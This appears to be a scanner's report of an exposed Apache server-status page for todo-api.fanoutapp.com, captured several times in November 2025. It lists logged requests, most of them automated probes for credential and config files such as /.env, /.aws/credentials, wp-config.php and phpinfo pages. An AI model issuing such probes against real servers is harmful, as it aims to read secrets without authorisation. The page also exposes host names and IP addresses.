0.0079973521125800.00.003.43 157.52.109.26http/1.1api.hnstream.com:8000GET /config/module.config.php HTTP/1.1 1-57-0/0/1099. 0.0079973432122870.00.003.15 157.52.109.26http/1.1api.hnstream.com:8000GET /app/etc/env.php HTTP/1.1 1-57-0/0/1125. 0.0079973439123000.00.003.60 157.52.109.26http/1.1api.hnstream.com:8000GET /linusadmin-phpinfo.php HTTP/1.1 1-57-0/0/1120. 0.0079973230134490.00.003.26 157.52.109.54http/1.1api.hnstream.com:8000GET /.docker/.env HTTP/1.1 1-57-0/0/1096. 0.0079973305155480.00.003.78 157.52.109.54http/1.1api.hnstream.com:8000GET /.aws/config HTTP/1.1 1-57-0/0/1118. 0.0079973402132970.00.003.29 157.52.109.26http/1.1api.hnstream.com:8000GET /config/acl.config.php HTTP/1.1 1-57-0/0/1104. 0.0079973426139610.00.003.57 157.52.109.26http/1.1api.hnstream.com:8000GET /prod/.env HTTP/1.1 1-57-0/0/1116. 0.0079973269158050.00.003.14 157.52.109.54http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-57-0/0/1130. 0.0079973431120290.00.003.21 157.52.109.26http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-57-0/0/1096. 0.0079973410126610.00.003.20 157.52.109.26http/1.1api.hnstream.com:8000GET /old_phpinfo.php HTTP/1.1 1-57-0/0/1113. 0.0079973388147040.00.003.37 157.52.109.26http/1.1api.hnstream.com:8000GET /src/config/config.json HTTP/1.1 1-57-0/0/1114. 0.0079973464165230.00.003.99 157.52.109.26http/1.1api.hnstream.com:8000GET /api/config/tsconfig.json HTTP/1.1 1-57-0/0/1076. 0.0079973472127350.00.003.09 157.52.109.26http/1.1api.hnstream.com:8000GET /phpversion.php HTTP/1.1 1-57-0/0/1122. 0.0079973494127930.00.003.47 157.52.109.26http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-57-0/0/1101. 0.0079973463117940.00.003.88 157.52.109.26http/1.1api.hnstream.com:8000GET /time.php HTTP/1.1 1-57-0/0/1119. 0.0079973438131420.00.003.37 157.52.109.26http/1.1api.hnstream.com:8000GET /application/config/mimes.php HTTP/1.1 1-57-0/0/1110. 0.0079973620120440.00.003.53 157.52.109.54http/1.1api.hnstream.com:8000GET /i.php HTTP/1.1 1-57-0/0/1107. 0.0079973679122400.00.003.74 157.52.109.54http/1.1api.hnstream.com:8000GET /application/config/foreign_chars.php HTTP/1.1 1-57-0/0/1094. 0.0079973454109090.00.003.57 157.52.109.26http/1.1api.hnstream.com:8000GET /config/view.php HTTP/1.1 1-57-0/0/1096. 0.0079973388128160.00.003.31 157.52.109.54http/1.1api.hnstream.com:8000GET /config/broadcasting.php HTTP/1.1 1-57-0/0/1097.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfb6817b8d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 07-Nov-2025 06:03:36 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 57 Parent Server MPM Generation: 56 Server uptime: 51 days 7 hours 58 minutes 29 seconds Server load: 0.12 0.19 0.17 Total accesses: 85961 - Total Traffic: 265.3 MB - Total Duration: 1029057 CPU Usage: u78.71 s123.94 cu1252.59 cs384.31 - .0415% CPU load .0194 requests/sec - 62 B/second - 3236 B/request - 11.9712 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0580612no1yes124010 1558020no0yes025000 2580640no0yes025000 Sum301 174010 ________________________W_______________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-565806120/3/1435_ 0.0833192830.00.014.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-565806120/5/1370_ 0.0833152010.00.023.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-565806120/4/1406_ 0.0853176520.00.013.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-565806120/4/1433_ 0.07103155890.00.014.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-565806120/3/1386_ 0.0863153950.00.014.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-565806120/4/1407_ 0.07103158730.00.014.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-565806120/3/1392_ 0.0833143670.00.014.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-565806120/4/1407_ 0.0783160640.00.014.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-565806120/3/1408_ 0.0873132330.00.014.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-565806120/4/1400_ 0.0803124500.00.013.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-565806120/4/1413_ 0.0853144800.00.013.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-565806120/5/1397_ 0.0813147350.00.024.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-565806120/4/1405_ 0.0803153400.00.014.28 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-565806120/4/1379_ 0.0843121430.00.013.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-565806120/4/1401_ 0.0823120990.00.013.91 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-565806120/5/1383_ 0.0823138490.00.014.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-565806120/3/1379_ 0.0863129480.00.013.73 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-565806120/3/1391_ 0.0873117620.00.013.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-565806120/3/1413_ 0.0873161130.00.014.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-565806120/3/1385_ 0.0813118950.00.013.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-565806120/4/1352_ 0.0793129690.00.014.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-565806120/4/1405_ 0.0783131070.00.014.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-565806120/4/1383_ 0.07104126200.00.014.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-565806120/4/1428_ 0.0843153710.00.014.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-5658061226/4/1385W 0.0700122340.00.014.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-565580200/9/1110_ 0.331478252188210.00.043.57 157.52.109.30http/1.1api.hnstream.com:8000GET /api/.env HTTP/1.1 1-565580200/7/1104_ 0.331478179116060.00.093.17 157.52.109.30http/1.1api.hnstream.com:8000GET /private/config.json HTTP/1.1 1-565580200/10/1078_ 0.331478199114540.00.033.40 157.52.109.30http/1.1api.hnstream.com:8000GET /admin-app/.env HTTP/1.1 1-565580200/7/1082_ 0.331478257112890.00.033.11 157.52.109.30http/1.1api.hnstream.com:8000GET /hosting.json HTTP/1.1 1-565580200/11/1104_ 0.331478218111710.00.143.55 157.52.109.30http/1.1api.hnstream.com:8000GET /application/.env HTTP/1.1 1-565580200/5/1105_ 0.331478274126530.00.023.22 157.52.109.30http/1.1api.hnstream.com:8000GET /.env.production HTTP/1.1 1-565580200/8/1077_ 0.331476100147180.00.023.73 157.52.109.30http/1.1api.hnstream.com:8000GET /admin/.env HTTP/1.1 1-565580200/7/1103_ 0.31147980122500.00.023.26 157.52.109.30http/1.1api.hnstream.com:8000GET /wp-config.php.bak HTTP/1.1 1-565580200/7/1089_ 0.311473128128940.00.093.54 157.52.109.30http/1.1api.hnstream.com:8000GET /application/config/foreign_chars.php HTTP/1.1 1-565580200/9/1096_ 0.31544115147490.00.163.08 157.52.109.30http/1.1api.hnstream.com:8000GET /.aws/config HTTP/1.1 1-565580200/8/1111_ 0.331478144109210.00.053.18 157.52.109.30http/1.1api.hnstream.com:8000GET /conf/application.json HTTP/1.1 1-565580200/8/1076_ 0.30147348114790.00.083.06 157.52.109.30http/1.1api.hnstream.com:8000GET /config/bootstrap.php HTTP/1.1 1-565580200/6/1097_ 0.331478266140440.00.023.33 157.52.109.30http/1.1api.hnstream.com:8000GET /.env.local HTTP/1.1 1-565580200/8/1098_ 0.335499150730.00.023.95 157.52.72.64http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-565580200/7/1058_ 0.311479128112660.00.033.05 157.52.109.30http/1.1api.hnstream.com:8000GET /config/security.config.php HTTP/1.1 1-565580200/10/1106_ 0.331478139119800.00.053.44 157.52.109.30http/1.1api.hnstream.com:8000GET /kyc/.env HTTP/1.1 1-565580200/9/1083_ 0.31147981102510.00.113.77 157.52.109.30http/1.1api.hnstream.com:8000GET /config/mail.php HTTP/1.1 1-565580200/7/1101_ 0.331478265123710.00.023.34 157.52.109.30http/1.1api.hnstream.com:8000GET /backend/.env HTTP/1.1 1-565580200/7/1097_ 0.331478170110680.00.023.51 157.52.109.30http/1.1api.hnstream.com:8000GET /appsettings.Production.json HTTP/1.1 1-565580200/8/1091_ 0.311473127112080.00.023.70 157.52.109.30http/1.1api.hnstream.com:8000GET /login/index.php HTTP/1.1 1-565580200/7/1077_ 0.29147636399340.00.023.53 157.52.109.30http/1.1 1-565580200/8/1080_ 0.331478222119520.00.023.28 157.52.109.30http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-565580200/10/1080_ 0.331478274128370.00.033.30 157.52.109.30http/1.1api.hnstream.com:8000GET /.env.example HTTP/1.1 1-565580200/9/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf71046fa1
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Wednesday, 05-Nov-2025 13:16:13 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 49 days 15 hours 11 minutes 7 seconds Server load: 0.12 0.15 0.12 Total accesses: 83259 - Total Traffic: 254.9 MB - Total Duration: 973568 CPU Usage: u76.47 s119.8 cu1187.29 cs366.14 - .0408% CPU load .0194 requests/sec - 62 B/second - 3210 B/request - 11.6932 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0373332no0yes025000 4373331no0yes124000 Sum200 149000 _________________________....................................... ....................................___W_____________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-543733320/34/1385_ 0.813265187370.00.144.22 157.52.96.106http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-543733320/31/1323_ 0.787780144860.00.153.67 127.0.0.1http/1.1hnstream.com:8000GET /image.php HTTP/1.1 0-543733320/31/1356_ 0.837839170420.00.073.87 140.248.108.17http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-543733320/30/1384_ 0.8378320147340.00.204.58 140.248.108.17http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-543733320/25/1338_ 0.787420147580.00.053.95 127.0.0.1http/1.1hnstream.com:8000GET /sx.php HTTP/1.1 0-543733320/31/1352_ 0.807425151050.00.214.42 157.52.109.52http/1.1api.hnstream.com:8000GET /.git/objects/info/packs HTTP/1.1 0-543733320/32/1339_ 0.837351136550.00.144.01 199.45.154.137http/1.1api.hnstream.com:8000\x16\x03\x01 0-543733320/30/1363_ 0.8374711154850.00.374.43 199.45.154.137http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-543733320/29/1356_ 0.837341125020.00.144.30 199.45.154.137http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-543733320/28/1348_ 0.807331116820.00.123.49 199.45.154.137http/1.1 0-543733320/30/1362_ 0.787220138040.00.133.61 64.62.197.140http/1.1 0-543733320/29/1347_ 0.836170138590.00.163.91 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-543733320/33/1359_ 0.833320147540.00.214.18 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-543733320/28/1337_ 0.786120115720.00.133.77 127.0.0.1http/1.1hnstream.com:8000GET /hq.php HTTP/1.1 0-543733320/23/1352_ 0.7817930113730.00.063.68 127.0.0.1http/1.1hnstream.com:8000GET /htaccess.php HTTP/1.1 0-543733320/30/1335_ 0.843311132520.00.214.16 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-543733320/26/1329_ 0.81112611117130.00.063.52 140.248.75.58http/1.1api.livecounter.org:8000GET /.git/HEAD HTTP/1.1 0-543733320/32/1344_ 0.8283470112100.00.223.75 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-543733320/24/1363_ 0.788293149030.00.154.05 167.82.237.138http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-543733320/31/1336_ 0.7811210112950.00.363.83 127.0.0.1http/1.1hnstream.com:8000GET /wp-admin/about.php HTTP/1.1 0-543733320/28/1304_ 0.778290122580.00.353.96 127.0.0.1http/1.1hnstream.com:8000GET /gool.php HTTP/1.1 0-543733320/28/1355_ 0.778240125020.00.133.85 127.0.0.1http/1.1hnstream.com:8000GET /135.php HTTP/1.1 0-543733320/29/1338_ 0.8282943119020.00.214.07 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-543733320/30/1378_ 0.828167146310.00.144.18 157.52.109.54http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-543733320/28/1333_ 0.778110114460.00.063.99 127.0.0.1http/1.1hnstream.com:8000GET /ioxi-o.php HTTP/1.1 1-48-0/0/1101. 0.00565311263181180.00.003.53 157.52.109.23http/1.1api.hnstream.com:8000GET /config/cache.php HTTP/1.1 1-48-0/0/1097. 0.0056531194109420.00.003.08 157.52.109.23http/1.1api.hnstream.com:8000GET /php_info.php HTTP/1.1 1-48-0/0/1068. 0.00565311148104820.00.003.38 157.52.109.23http/1.1api.hnstream.com:8000GET /public/client/planinfo HTTP/1.1 1-48-0/0/1075. 0.00565311131108540.00.003.08 157.52.109.23http/1.1api.hnstream.com:8000GET /infos.php HTTP/1.1 1-48-0/0/1093. 0.0056531174106260.00.003.41 157.52.109.23http/1.1api.hnstream.com:8000GET /time.php HTTP/1.1 1-48-0/0/1100. 0.0056531178121300.00.003.21 157.52.109.23http/1.1api.hnstream.com:8000GET /old_phpinfo.php HTTP/1.1 1-48-0/0/1069. 0.00565311315138890.00.003.71 157.52.109.23http/1.1api.hnstream.com:8000GET /app_dev.php/_profiler/phpinfo HTTP/1.1 1-48-0/0/1096. 0.00565311333118830.00.003.24 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/email.php HTTP/1.1 1-48-0/0/1082. 0.00565311260124080.00.003.45 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/mimes.php HTTP/1.1 1-48-0/0/1087. 0.00565311132144460.00.002.92 157.52.109.23http/1.1api.hnstream.com:8000GET /temp.php HTTP/1.1 1-48-0/0/1103. 0.0056531183105610.00.003.13 157.52.109.23http/1.1api.hnstream.com:8000GET /config/paths.php HTTP/1.1 1-48-0/0/1068. 0.00565311185111900.00.002.97 157.52.109.23http/1.1api.hnstream.com:8000GET /config/production.config.php HTTP/1.1 1-48-0/0/1091. 0.00565311168133470.00.003.32 157.52.109.23http/1.1api.hnstream.com:8000GET /config/bootstrap.php HTTP/1.1 1-48-0/0/1090. 0.00565311224138840.00.003.93 157.52.109.23http/1.1api.hnstream.com:8000GET /app/etc/config.php HTTP/1.1 1-48-0/0/1051. 0.00565311176108220.00.003.02 157.52.109.23http/1.1api.hnstream.com:8000GET /config/app_local.php HTTP/1.1 1-48-0/0/1096. 0.00565311325113130.00.003.39 157.52.109.23http/1.1api.hnstream.com:8000GET /config/routes.php HTTP/1.1 1-48-0/0/1074. 0.0056531128097360.00.003.65 157.52.109.23http/1.1api.hnstream.com:8000GET /.vscode/sftp.json HTTP/1.1 1-48-0/0/1094. 0.00565311272116140.00.003.31 157.52.109.23http/1.1api.hnstream.com:8000GET /wp-config.php HTTP/1.1 1-48-0/0/1090. 0.00565311257104180.00.003.49 157.52.109.23http/1.1api.hnstream.com:8000GET /symfony/_profiler/phpinfo HTTP/1.1 1-48-0/0/1083. 0.00565311287101900.00.003.68 157.52.109.23http/1.1api.hnstream.com:8000GET /config/view.php HTTP/1.1 1-48-0/0/1070. 0.0056531132495520.00.003.52 157.52.109.23http/1.1api.hnstream.com:8000GET /config/security.config.php HTTP/1.1 1-48-0/0/1072. 0.00565311226112070.00.003.25 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/constants.php HTTP/1.1 1-48-0/0/1070. 0.00565311276114570.00.003.27 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/foreign_chars.php HTTP/1.1 1-48-0/0/1097. 0.00565311295113520.00.003.43 157.52.109.23http/1.1api.hnstream.com:8000GET /phpinfo.php3 HTTP/1.1 1-48-0/0/1067. 0.00565311295113360.00.003.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfcc7e99d9
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Monday, 03-Nov-2025 10:08:17 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 53 Parent Server MPM Generation: 52 Server uptime: 47 days 12 hours 3 minutes 10 seconds Server load: 0.14 0.20 0.18 Total accesses: 78728 - Total Traffic: 238.4 MB - Total Duration: 922799 CPU Usage: u71.74 s113.18 cu1126.83 cs348.78 - .0405% CPU load .0192 requests/sec - 60 B/second - 3175 B/request - 11.7214 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0187773no1yes124000 4187772no1yes025000 Sum202 149000 ___________W_____________....................................... ...................................._________________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-521877730/12/1289_ 0.2833166410.00.023.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-521877730/10/1229_ 0.2833124280.00.033.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-521877730/9/1260_ 0.2753157110.00.023.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-521877730/10/1289_ 0.2803130630.00.094.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-521877730/11/1245_ 0.2833137340.00.023.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-521877730/9/1257_ 0.2823127990.00.024.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-521877730/10/1242_ 0.2823130190.00.093.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-521877730/8/1269_ 0.2813147280.00.023.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-521877730/8/1264_ 0.2813120390.00.024.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-521877730/9/1257_ 0.2813110020.00.023.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-521877730/10/1261_ 0.2773116030.00.023.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-5218777326/13/1254W 0.2700133150.00.033.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-521877730/12/1267_ 0.2803140410.00.023.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-521877730/9/1238_ 0.2803109510.00.023.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-521877730/11/1265_ 0.2773109180.00.033.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-521877730/9/1243_ 0.2763127280.00.093.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-521877730/7/1240_ 0.2763112480.00.023.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-521877730/10/1249_ 0.2763105600.00.023.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-521877730/7/1268_ 0.2763142050.00.023.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-521877730/11/1240_ 0.275394320.00.023.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-521877730/7/1215_ 0.2753104130.00.023.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-521877730/11/1260_ 0.2753110770.00.023.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-521877730/9/1243_ 0.2833104620.00.023.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-521877730/12/1281_ 0.2843125770.00.033.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-521877730/9/1240_ 0.2843100060.00.023.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-48-0/0/1101. 0.00381234263181180.00.003.53 157.52.109.23http/1.1api.hnstream.com:8000GET /config/cache.php HTTP/1.1 1-48-0/0/1097. 0.0038123494109420.00.003.08 157.52.109.23http/1.1api.hnstream.com:8000GET /php_info.php HTTP/1.1 1-48-0/0/1068. 0.00381234148104820.00.003.38 157.52.109.23http/1.1api.hnstream.com:8000GET /public/client/planinfo HTTP/1.1 1-48-0/0/1075. 0.00381234131108540.00.003.08 157.52.109.23http/1.1api.hnstream.com:8000GET /infos.php HTTP/1.1 1-48-0/0/1093. 0.0038123474106260.00.003.41 157.52.109.23http/1.1api.hnstream.com:8000GET /time.php HTTP/1.1 1-48-0/0/1100. 0.0038123478121300.00.003.21 157.52.109.23http/1.1api.hnstream.com:8000GET /old_phpinfo.php HTTP/1.1 1-48-0/0/1069. 0.00381234315138890.00.003.71 157.52.109.23http/1.1api.hnstream.com:8000GET /app_dev.php/_profiler/phpinfo HTTP/1.1 1-48-0/0/1096. 0.00381234333118830.00.003.24 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/email.php HTTP/1.1 1-48-0/0/1082. 0.00381234260124080.00.003.45 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/mimes.php HTTP/1.1 1-48-0/0/1087. 0.00381234132144460.00.002.92 157.52.109.23http/1.1api.hnstream.com:8000GET /temp.php HTTP/1.1 1-48-0/0/1103. 0.0038123483105610.00.003.13 157.52.109.23http/1.1api.hnstream.com:8000GET /config/paths.php HTTP/1.1 1-48-0/0/1068. 0.00381234185111900.00.002.97 157.52.109.23http/1.1api.hnstream.com:8000GET /config/production.config.php HTTP/1.1 1-48-0/0/1091. 0.00381234168133470.00.003.32 157.52.109.23http/1.1api.hnstream.com:8000GET /config/bootstrap.php HTTP/1.1 1-48-0/0/1090. 0.00381234224138840.00.003.93 157.52.109.23http/1.1api.hnstream.com:8000GET /app/etc/config.php HTTP/1.1 1-48-0/0/1051. 0.00381234176108220.00.003.02 157.52.109.23http/1.1api.hnstream.com:8000GET /config/app_local.php HTTP/1.1 1-48-0/0/1096. 0.00381234325113130.00.003.39 157.52.109.23http/1.1api.hnstream.com:8000GET /config/routes.php HTTP/1.1 1-48-0/0/1074. 0.0038123428097360.00.003.65 157.52.109.23http/1.1api.hnstream.com:8000GET /.vscode/sftp.json HTTP/1.1 1-48-0/0/1094. 0.00381234272116140.00.003.31 157.52.109.23http/1.1api.hnstream.com:8000GET /wp-config.php HTTP/1.1 1-48-0/0/1090. 0.00381234257104180.00.003.49 157.52.109.23http/1.1api.hnstream.com:8000GET /symfony/_profiler/phpinfo HTTP/1.1 1-48-0/0/1083. 0.00381234287101900.00.003.68 157.52.109.23http/1.1api.hnstream.com:8000GET /config/view.php HTTP/1.1 1-48-0/0/1070. 0.0038123432495520.00.003.52 157.52.109.23http/1.1api.hnstream.com:8000GET /config/security.config.php HTTP/1.1 1-48-0/0/1072. 0.00381234226112070.00.003.25 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/constants.php HTTP/1.1 1-48-0/0/1070. 0.00381234276114570.00.003.27 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/foreign_chars.php HTTP/1.1 1-48-0/0/1097. 0.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf0c5764ee
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 02-Nov-2025 05:33:56 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 52 Parent Server MPM Generation: 51 Server uptime: 46 days 7 hours 28 minutes 49 seconds Server load: 0.12 0.19 0.18 Total accesses: 76826 - Total Traffic: 232.2 MB - Total Duration: 906573 CPU Usage: u70.05 s110.54 cu1103 cs341.92 - .0406% CPU load .0192 requests/sec - 60 B/second - 3169 B/request - 11.8003 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 095340no1yes124010 495339no0yes025000 Sum201 149010 ____________W____________....................................... ...................................._________________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-51953400/17/1238_ 0.3023162400.00.033.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-51953400/15/1175_ 0.3023121860.00.033.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-51953400/18/1210_ 0.3023153320.00.033.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-51953400/15/1238_ 0.3013127480.00.033.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-51953400/18/1194_ 0.3013129800.00.033.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-51953400/16/1207_ 0.3113124940.00.033.91 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-51953400/18/1189_ 0.3113126460.00.043.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-51953400/16/1222_ 0.3113143840.00.033.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-51953400/17/1217_ 0.3104118770.00.033.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-51953400/17/1205_ 0.3103106910.00.032.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-51953400/19/1211_ 0.3103113080.00.043.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-51953400/14/1202_ 